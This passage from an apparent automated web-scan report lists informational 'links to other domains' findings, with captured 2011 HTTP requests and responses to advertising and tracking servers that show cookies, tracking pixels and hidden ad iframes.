User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxljk1rAjEQhv9L7oHMZGaSjKf9SGHBLlIr9CZmjSgU9rDYS%252FG%252Ftwq92NvLw%252FPAe1DW70W9mt3Qm9XvQjUQmEoRdoJ%252B4lLJn6aDKxwmn8Ad090DUHO9HPdbdDSM3SMVNZOvyELVhliKpVNlWxyITbXUWKMjcf45b%252FqPO8KgpmvyNo%252FnsHxeh4tfz%252Fz%252BNu%252FneWm%252FXv9Vm%252FGBkhoMSD6Kg4QYIglCfLY3u%252FbvIqZMvo8vlrFjS11obYu5sQ4iUJIsEsCsbj9wpUlM; EVX=eJyNkEsOgzAMRO%252FCCTxOgpNwGIsl6y4r7t44oSDKp%252BwivRnHz2NO%252BT3llFIYxhztTcMrI%252BYOQUhFmbxSgLKiG6aMlUY2iqhErKTOKP9Q6xIKZaPuhMJonew36oxyql20yWFPgaDkSrN1%252B5Um2xkiS7dS2Si%252B%252F8piNBd5QgQVfez1j4JzvVRfouFf9Hip%252FS341tbd2vobW1uRhcSd%252BBw%252Baj7yMCouRlyFdyu2JZhPjnq1MTMehn1Kjp6F5w8ZP7gL; BFF=eJztlk1PwzAMhv%252FLfkE%252B2qXpLrAiwSRWJijTOCGOnDkC%252F502STPHsVsYIHHg6sevnQ%252B3eZ9qI%252BvXl1qW9eJOiWLTNm9Cnllry8XquQ8bseqprhfbm7a7un543G%252FuNt1i9VTb6hNCASkEKgKsMZGgQp0UxXbIVgHIHpQhDkJJriZAyxRpudykSNjw%252BcUhbHjpaaXAhj2FQEWANSYSVOh2eziTfXejANAuTmRaISspEDhfdznQLg4z4yXu00tM9uQpsaceYE28xD3MN6CQohd85BAUoFGmMmDGJqs2XNWGUMFrVtyReMpfc0ms02k0v07PiXW6muw6d%252B3UODpKrXPXcuO4a7k2%252FHE4yrchj2PQTB2H49RxDDUzlWtYynAWJiA97ssRELQ%252BiHMLHwYR9wvcXLq6ygijAVuOCOYLF8yTfR2U6T5TnBk%252F7AygSco4HBhWHM6dFQ%252FHy4nHL5gTuw%252BVFzcz4iaHw0VJWVIX1YeJUzO6qqTBV10o8qoLlSZ20mjwSIyJQxi2kmMmHMOEZKsAt61UkFiBgUQgjEGuiIBSFP3bIRKQDQ6qmA4OgoRYTonJznHqmM5%252B6pjOQEx2HsVU5%252BPI0p3DyNKdoZjqHMUJDP%252FM3f06fVXtaDCOFAIVAdaYSGC%252BAYXS9y9vpCAoQKNMhaqC7zEXp%252FB90t5RTs5yts1O2rZTPRpvxSjXlX5rnzZZM56Kt06zLulEM4QGtiHgtOf5hrX5hoPhjcqMJznJeuT%252FkwzyDoMxE1PWgbUJP%252BoKqP8zgn%252FRFeQTiyHjCr7qAZgX%252F%252F99%252F3%252FfT3%252Ff%252BWd89sX%252BrYf5A2A8Po8%253D; TFF=eJyVljGSwyAMRe%252FiEyCBI4MbH2NbFyl2ZrvdLpO7L3ZixSCUiCJjx%252FOf%252BR8JzJoukG6%252FCTAN6MLiRlhijDjMa8J0%252B04w599ILl%252FccXsX%252BnHT%252B0qP8%252BPvmSPGbER%252B5kKpjPBUjvLd16%252Frz%252Fp3HRQCfSMGbH4urhU7nsxAQ1%252BH4IF8xRFjNiJf1dhB8YTQzEBahqdeFOIYp%252BaIMSuxNwlMi3PYcjYh6%252FPtpg8vPcToCauRdqKcLUlGB5PwqJOlx7qRrdzFyhFjNiI%252Fg6nH09ZmrrmI5XyXejX7B07NXnPEWPdI0JkI3icCxRmozmpiHwmjOten2nju0EOP5MjXI3lZVUG2V4VKlh7FbBg5UV8jR1aOGLMR%252BRnGDk8A4%252BJ8c3ds1unQk58mUFPAG%252FJ9nQRZelTr9IFT61RzxJiNyFcYOzxh2HZh%252B3wf%252Br7uJgbNXROwp2vIq1%252BuD3pjHz8q8cCsGbK8KwNpO1R8Hemi4%252F499EiI4qwij2gKKc5FFrJZfRMZMin2Dp0s56VebVauXm0qR4zZiK3G1OFp%252F3BRu8YnPTT0Irs8yUU4fx9JPfGWxP0fwDsYOA%253D%253D

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
Set-Cookie: xltl=eJxlj8tqwzAURP9Fe4HuQ1fSzcqvgiE1IWmguxA5CjUUvDDppvTfmxi6SXfDcA7MnFX0e1FSc%252Bxbs7knVAPBc87inSCNPhem63h22YeRErhLenAAam7T5XRAx%252F3QrKqoGamgFy42xJwtX4u32YHYVHKJJToWR8961b4%252FKgxqmqo7dMNHWD5v%252FUTb2b%252Ft59M8L%252FXX6z9rN6xVUoMBmaI4SIghsiDEZ3p3rP8mYuqY2vhiPTbechNqW2NXWQcROEknEmBl1Wz392OTgk%252FkfKDNzy%252Bp305G; expires=Fri, 09-Sep-2011 13:33:27 GMT; path=/; domain=.exelator.com
Set-Cookie: BFF=eJztlsty2zAMRf%252FFX8CHZIryxok803omUj2J6klXnSyzzrLtv5ciKRoEAfmRLrrwFgcX4AOU7lvbrNtfH62s29WLEtV%252B6H4LubXW1qvNuwsbsXFUt6v%252B2zB%252Bffrx87h%252F2Y%252BrzVsr5SVKASkEKgGsMYmgQqMUVT9lqwikA3WMg1CWqwkwMEUGLjcrEjf8sHuNG14H2iiw4UAhUAlgjUkEFXruX7fSdTcKAO3jRKYVspECgYfHsQTax2FmusRjfonZngIl9uQA1qRLPMJ8AwopesEnDkEFGhUqA2ZssWrHVe0IFbxmxR1JoPw118Q6vUbz6wycWKevya7zMCyNo6fUOg8DN46HgWvDH4enfBvyOCbN0nF4Th3HVLNQ%252BYa1jGdhItLzvjwBQRuCOLcKYRDx38D9F19XGWE0YOsZwXzhg2VyqIMy%252FTPFmelhFwBNUsHhwLDieO6seDpeTjy%252FYE7sHyov7s6IuxJOFyVlTV2UCxOnZnTTSIOvulLkVVcqTxyl0eAnMSdOYdhKzplwDDNSrALctlJRYgUGEoE4BqUiAUpRuX%252BHyEAxOKhiPjgIEmK5JCY7p6ljOoepYzoDMdl5FlOdTyNLd44jS3eGYqpzEmcwfjMP3x%252Fzv6qdDcaJQqASwBqTCMw3oFD%252B%252FysbKQgq0KhQoargPZZiDN0L6vvdVmkj5uXPn75%252BBwI2zCnOs9NLeKbkLozzRkrePfWU3IVBwBlYONA4f%252Friz%252FNcsHU2kazUDSQnjSPFSaeJ4qXdsrRjpfE6Oel0mzn7s%252BjVKVtuOQ9uFz34rYab99WUhc4%252FnBc75jMGmffBZy3vjc7WFj%252FMAi4b2E%252F41E%252FYUd51njGYN%252FnI7JCwXQyQt4uMM1zygazn%252B6cWL98Vsnj2v7V45cRiyFi8aw0dY9%252FuZu1u1m43a7wnW7JfcOQLl6UJMfdeCpeleZd1nam6zkPdLdMllukvgt0M9Q%253D%253D; expires=Fri, 09-Sep-2011 13:33:27 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJydlkFywyAMRe%252FSEyCBI%252BRsfIxus8iiM921u0zuXuzY2CDkiC4ydpj%252FzBcSgtt4iePjZwQcP9CFyQ0wMTN%252BXG8jjo%252BvEa7pN5BLD7e9PoV%252BmPW%252B0uP19ffIUcZsRBpzoVQyrMpBfvv%252Bef%252B%252B%252Fd6rb7NfCQyNMGD2c3GtsPlgBhr6OohszVccZcxGpKcadlA8ITRjIC2GVS8Ssc1Tc5QxK7EUCcTJOWw5i5j16XXWh10PzJ6wmmkhytWSJDuIwqNOlh7rQrZyFytHGbMRaQxij6e5zFxzE8v1LvVq7G84Nfaao4x1zwSdEcF5RKA4A9VZTSwzIatrfciNzxW66ZEc%252BXqmrUmdke1doZKlR7EaRk7k18iRlaOM2Yg0htzhCWCYnG92x2aeNj35GEGNAk7I8zwJsvSo5ukNp%252Bap5ihjNiI9YejwhGHuwvb13vR91U0ZNFdNwJ6qIa%252BeXG%252F0xjp%252BZeKFWWNI8q4YSOtQvF%252Fp2OX63fRIiOKuIq9oCinuRRaymX0TGRIpeodOlutS7zYrV%252B82laOM2Yg5x9ThaTm4qJ3jgx4aehG7vMkxHM9HUm%252B8zZl8VKtvr1be%252B8Cqb1eC7DjsGzOFf3J1n9c5v3PoyYlF1EDKnI1IYz6alM8%252F0Jl0IA%253D%253D; expires=Fri, 09-Sep-2011 13:33:27 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Wed, 12-May-2010 13:33:26 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Wed, 12-May-2010 13:33:26 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJyNkEkSgzAMBP%252FCCzSSjWzzGBVHzjmm%252BHssQxbCktxc1TOWWmMBlftUcs5xGEvyNw23glQ6RCVTYwpGEcaGbpgKXjSxUyQjYiMTp%252FxFvUuolJ3KAYXT9nN4U3HKuXWx%252FBy3FIhGUptLt3%252FR7DtDde02qm%252BK51xdjeYqT0igqo%252Bt%252Fl5wbpfqazT%252Biu4vtb0FX9rKpW24sPUVWUnlwGc3aPHRGuVf0U%252Bf3KikRsM6VSUl6MnUjcCyIvPByc98mPFnOOQs9G%252BYRSkeZPd%252B8wM4%252B8q6; expires=Fri, 09-Sep-2011 13:33:27 GMT; path=/; domain=.exelator.com
Date: Thu, 12 May 2011 13:33:27 GMT
Server: HTTP server
Content-Length: 891

document.write('<img src="http://ad.yieldmanager.com/pixel?id=23705&data=238001&id=717024&data=238001&t=2" width="1" height="1"></img><iframe width="0" height="0" frameborder="0" src="http://loadus.ex
...[SNIP]...
13.52. http://loadus.exelator.com/load/net.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/net.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9waXhlbC5tYXRodGFnLmNvbS9kYXRhL2ltZz9tdF9pZD0xMDAxMzQmbXRfZGNpZD0yNCZ2MT0mdjI9JnYzPSZzMT0mczI9JnMzIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2JzdGF0cy5hZGJyaXRlLmNvbS9jbGljay9ic3RhdHMuZ2lmP2JhcGlkPTYzODgmdWlkPTc2ODkxMCZraWQ9NDMxMDU5OTkiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0yNCIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2EuY29sbGVjdGl2ZS1tZWRpYS5uZXQvZGF0YXBhaXI%2FbmV0PWV4JnNlZ3M9MTUmb3A9YWRkIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=97ff285f8e77e8edbb026a8559ac3e76 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxlj01rwzAQRP%252BL7gLtanclbU7%252BKhhSE5IGeguRo1BDwQeTXkr%252FexNDL%252BltGN6DmbOKfi%252Fq1Rz71mzuCdVAYMpZ2An6kXMhfx3PLnMYfQJ3SQ8OQM1tupwO6KgfmlUVNaMvyELFhpizpWthmx2ITSWXWKIjcf5Zr9r3R4VBTVN1h274CMvnrZ%252F8dua3%252FXya56X%252Bev1n7Ya1SmowIPkoDhJiiCQI8ZneHeu%252FiZg68m18sYwNW2pCbWvsKusgAiXpRAKsrJrt%252Fn5sUuDkHQfY%252FPwCqdlORA%253D%253D; BFF=eJztlsty2zAMRf%252FFX8CHZIryxok803omUj2J6klXnSyzzrLtv5ciKRoEAfmRLrrwFgcX4AOU7lvbrNtfH62s29WLEtV%252B6H4LubXW1qvNuwsbsXFUt6v%252B2zB%252Bffrx87h%252F2Y%252BrzVsr5SVKASkEKgGsMYmgQqMUVT9lqwikA3WMg1CWqwkwMEUGLjcrEjf8sHuNG14H2iiw4UAhUAlgjUkEFXruX7fSdTcKAO3jRKYVspECgYfHsQTax2FmusRjfonZngIl9uQA1qRLPMJ8AwopesEnDkEFGhUqA2ZssWrHVe0IFbxmxR1JoPw118Q6vUbz6wycWKevya7zMCyNo6fUOg8DN46HgWvDH4enfBvyOCbN0nF4Th3HVLNQ%252BYa1jGdhItLzvjwBQRuCOLcKYRDx38D9F19XGWE0YOsZwXzhg2VyqIMy%252FTPFmelhFwBNUsHhwLDieO6seDpeTjy%252FYE7sHyov7s6IuxJOFyVlTV2UCxOnZnTTSIOvulLkVVcqTxyl0eAnMSdOYdhKzplwDDNSrALctlJRYgUGEoE4BqUiAUpRuX%252BHyEAxOKhiPjgIEmK5JCY7p6ljOoepYzoDMdl5FlOdTyNLd44jS3eGYqpzEmcwfjMP3x%252Fzv6qdDcaJQqASwBqTCMw3oFD%252B%252FysbKQgq0KhQoargPZZiDN0L6vvdVmkj5uXPn75%252BBwI2zCnOs9NLeKbkLozzRkrePfWU3IVBwBlYONA4f%252Friz%252FNcsHU2kazUDSQnjSPFSaeJ4qXdsrRjpfE6Oel0mzn7s%252BjVKVtuOQ9uFz34rYab99WUhc4%252FnBc75jMGmffBZy3vjc7WFj%252FMAi4b2E%252F41E%252FYUd51njGYN%252FnI7JCwXQyQt4uMM1zygazn%252B6cWL98Vsnj2v7V45cRiyFi8aw0dY9%252FuZu1u1m43a7wnW7JfcOQLl6UJMfdeCpeleZd1nam6zkPdLdMllukvgt0M9Q%253D%253D; TFF=eJydlkFywyAMRe%252FSEyCBI%252BRsfIxus8iiM921u0zuXuzY2CDkiC4ydpj%252FzBcSgtt4iePjZwQcP9CFyQ0wMTN%252BXG8jjo%252BvEa7pN5BLD7e9PoV%252BmPW%252B0uP19ffIUcZsRBpzoVQyrMpBfvv%252Bef%252B%252B%252Fd6rb7NfCQyNMGD2c3GtsPlgBhr6OohszVccZcxGpKcadlA8ITRjIC2GVS8Ssc1Tc5QxK7EUCcTJOWw5i5j16XXWh10PzJ6wmmkhytWSJDuIwqNOlh7rQrZyFytHGbMRaQxij6e5zFxzE8v1LvVq7G84Nfaao4x1zwSdEcF5RKA4A9VZTSwzIatrfciNzxW66ZEc%252BXqmrUmdke1doZKlR7EaRk7k18iRlaOM2Yg0htzhCWCYnG92x2aeNj35GEGNAk7I8zwJsvSo5ukNp%252Bap5ihjNiI9YejwhGHuwvb13vR91U0ZNFdNwJ6qIa%252BeXG%252F0xjp%252BZeKFWWNI8q4YSOtQvF%252Fp2OX63fRIiOKuIq9oCinuRRaymX0TGRIpeodOlutS7zYrV%252B82laOM2Yg5x9ThaTm4qJ3jgx4aehG7vMkxHM9HUm%252B8zZl8VKtvr1be%252B8Cqb1eC7DjsGzOFf3J1n9c5v3PoyYlF1EDKnI1IYz6alM8%252F0Jl0IA%253D%253D; EVX=eJyNkEkSgzAMBP%252FCCzSSjWzzGBVHzjmm%252BHssQxbCktxc1TOWWmMBlftUcs5xGEvyNw23glQ6RCVTYwpGEcaGbpgKXjSxUyQjYiMTp%252FxFvUuolJ3KAYXT9nN4U3HKuXWx%252FBy3FIhGUptLt3%252FR7DtDde02qm%252BK51xdjeYqT0igqo%252Bt%252Fl5wbpfqazT%252Biu4vtb0FX9rKpW24sPUVWUnlwGc3aPHRGuVf0U%252Bf3KikRsM6VSUl6MnUjcCyIvPByc98mPFnOOQs9G%252BYRSkeZPd%252B8wM4%252B8q6

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:32 GMT
Server: HTTP server
Content-Length: 478

<HTML><BODY><img src="http://pixel.mathtag.com/data/img?mt_id=100134&mt_dcid=24&v1=&v2=&v3=&s1=&s2=&s3" width="1" height="1"></img><img src="http://bstats.adbrite.com/click/bstats.gif?bapid=6388&uid=768910&kid=43105999" width="0" height="0" border="0"></img><img src="http://ads.adbrite.com/adserver/behavioral-data/8201?d=24" width="0" height="0" border="0"></img><img src="http://a.collective-media.net/datapair?net=ex&segs=15&op=add" width="1" height="1"></img>
...[SNIP]...
13.53. http://mads.com.com/mac-ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mads.com.com
Path:   /mac-ad

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /mac-ad?CELT=ifc&BRAND=2&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=13038 HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:28 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 12 May 2011 13:28:28 GMT
Content-Length: 1981

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<div align="center"><a href="http://www.cbsnews.com/60minutesovertime" target="_blank"><img src="http://i.i.com.com/cnwk.1d/Ads/7074/11/44/20110408/bu.jpg" height="250" width="300" border="0" alt="Click Here" />
...[SNIP]...
13.54. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /gadgets/ifr?url=http://fcgadgets.appspot.com/spec/shareit.xml&container=peoplesense&parent=http://orangeorb.blogspot.com/&mid=0&view=profile&libs=google.blog&d=0.558.7&lang=en&country=US&view-params=%7B%22skin%22:%7B%22FACE_SIZE%22:%2232%22,%22HEIGHT%22:%22200%22,%22TITLE%22:%22Share+it%22,%22BORDER_COLOR%22:%22transparent%22,%22ENDCAP_BG_COLOR%22:%22transparent%22,%22ENDCAP_TEXT_COLOR%22:%22%23ffffff%22,%22ENDCAP_LINK_COLOR%22:%22%23ffc619%22,%22ALTERNATE_BG_COLOR%22:%22transparent%22,%22CONTENT_BG_COLOR%22:%22transparent%22,%22CONTENT_LINK_COLOR%22:%22%23ffc619%22,%22CONTENT_TEXT_COLOR%22:%22%23ffffff%22,%22CONTENT_SECONDARY_LINK_COLOR%22:%22%23ffc619%22,%22CONTENT_SECONDARY_TEXT_COLOR%22:%22%23000000%22,%22CONTENT_HEADLINE_COLOR%22:%22%23050c10%22,%22FONT_FACE%22:%22normal+normal+20px+Arial,+Tahoma,+Helvetica,+FreeSans,+sans-serif;%22%7D%7D&communityId=09528749658452737714&caller=http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html HTTP/1.1
Host: ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209791819.1303087791.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=209791819.444546987.1303087791.1303087791.1304097769.2

Response

HTTP/1.1 200 OK
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 12 May 2011 13:37:52 GMT
Cache-Control: private,max-age=300
Date: Thu, 12 May 2011 13:32:52 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 121626

<html><head><script>(function(){var a=window;function b(g){this.t={};this.tick=function(h,i,c){c=c!=undefined?c:(new Date).getTime();this.t[h]=[c,i]};this.tick("start",null,g)}var d=new b;a.jstiming={
...[SNIP]...
<div id="paging_controls" style="overflow: hidden; padding: 2px 0px 4px 6px;">
<a href="http://fcgadgets.blogspot.com/" target="_blank">Get more gadgets for your site</a>
...[SNIP]...
13.55. http://p.brilig.com/contact/bct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/bct

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2829&action=1 HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz00MTYmcHhpZD02MDY4JnB4aWQ9NTQ3JnB4aWQ9NTc3MiZweGlkPTQ2OCZweGlkPTExMzY%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbid=AF3T0ZuAGOk4NdOmwmcHrt8jZvpqOmyTfBnhe9lXkrHzvb6m4hSMri5FOCMElW8Qz5pV2zxkbOa8; BriligContact=85cb651d-def1-4cfa-a1e1-8e977f5422e6; bbid=AF3T0ZtQvE4ldhDjJkiNJY0_p7VFsmSfo5bKptpFGktLe90uh4mGpS26wgp3klEvHNjWva5bwYOhKRQ-5ZUz4AUMwLwTl6EeVw

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,no-store,must-revalidate,post-check=0,pre-check=0
Content-Type: text/html
Date: Thu, 12 May 2011 13:34:13 GMT
Expires: Mon, 19 Dec 1983 13:34:13 GMT
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Pragma: no-cache
Server: Apache/2.2.16 (Ubuntu)
Set-Cookie: BriligContact=85cb651d-def1-4cfa-a1e1-8e977f5422e6; Domain=.brilig.com; Expires=Sat, 04-May-2041 13:34:13 GMT
Set-Cookie: bbid=AF3T0ZsSQXxcXGNQhruk_ckmiNToArTQwF73nXBayBb3eVHust9UOOOatpD5nA3Yx89KD9p74jNACfQK0CUcvc25LY1cxMkFsA; Domain=.brilig.com; Expires=Sat, 04-May-2041 13:34:13 GMT
Vary: Accept-Encoding
X-Brilig-D: D=2880
Connection: keep-alive
Content-Length: 133

<iframe frameborder='0' src='http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999?nocache=9338&1=999'width='0' height='0'></iframe>
13.56. http://p.brilig.com/contact/bct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/bct

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2716&action=1 HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zMTMmcHhpZD01ODE1JnB4aWQ9MTAwMSZweGlkPTUzJnB4aWQ9NDcyJnB4aWQ9NjA0MQ%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbid=AF3T0ZuAGOk4NdOmwmcHrt8jZvpqOmyTfBnhe9lXkrHzvb6m4hSMri5FOCMElW8Qz5pV2zxkbOa8; BriligContact=85cb651d-def1-4cfa-a1e1-8e977f5422e6

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,no-store,must-revalidate,post-check=0,pre-check=0
Content-Type: text/html
Date: Thu, 12 May 2011 13:31:38 GMT
Expires: Mon, 19 Dec 1983 13:31:38 GMT
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Pragma: no-cache
Server: Apache/2.2.16 (Ubuntu)
Set-Cookie: BriligContact=85cb651d-def1-4cfa-a1e1-8e977f5422e6; Domain=.brilig.com; Expires=Sat, 04-May-2041 13:31:38 GMT
Set-Cookie: bbid=AF3T0Zvf1vDmRq2eOORXBaX-UQvWlgIUZO5XvUBOHKRHkojeDIbMFpwy0k092YGADE_VkxxdKe6RgzLMaIlJXL8-cU29eqJ7Wg; Domain=.brilig.com; Expires=Sat, 04-May-2041 13:31:38 GMT
Vary: Accept-Encoding
X-Brilig-D: D=2778
Connection: keep-alive
Content-Length: 133

<iframe frameborder='0' src='http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999?nocache=7814&1=999'width='0' height='0'></iframe>
13.57. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/members.xml&container=peoplesense&parent=http://orangeorb.blogspot.com/&mid=1&view=profile&libs=google.blog&d=0.558.7&lang=en&country=US&communityId=09528749658452737714&caller=http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html HTTP/1.1
Host: r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 12 May 2011 13:37:53 GMT
Cache-Control: private,max-age=300
Date: Thu, 12 May 2011 13:32:53 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 162569

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><script>(function(){var a=window;function b(g){this.t={};this.tick=function(h,i,c){c=
...[SNIP]...
</style><link href="http://www.google.com/friendconnect/styles/gadgets-ltr.css?d=0.558.7" rel="stylesheet" type="text/css">


</head>
...[SNIP]...
<span class="fc-on-other-site" jsdisplay="siteTitle">
&nbsp;<img class="delete-button" jsdisplay="typeof($this.deleteHandler) != &#39;undefined&#39; &amp;&amp; $this.deleteHandler != null" jsvalues="$h:handle(this, $this.deleteHandler);alt:MSG_DELETE_THIS;title:MSG_DELETE_THIS" src="http://www.google.com/friendconnect/scs/images/trash.gif">
</span>
...[SNIP]...
d(0);" jsselect="person" jsvalues="$h:handle(this,&#39;goToInviteFriend&#39;);.className:(isCanvasMode() ? &#39;fc-default-link fc-default-link-canvas&#39; : &#39;fc-default-link&#39;)">
<img class="fc-plus-pic" src="http://www.google.com/friendconnect/scs/images/plus.gif">
<span jscontent="MSG_ADD_AS_FRIEND">
...[SNIP]...
id(0);" jsselect="person" jsvalues="$h:handle(this,&#39;sendMessageDialog&#39;);.className:(isCanvasMode() ? &#39;fc-default-link fc-default-link-canvas&#39; : &#39;fc-default-link&#39;)">
<img class="fc-envelope-pic" src="http://www.google.com/friendconnect/scs/images/smallEnvelope.jpg">
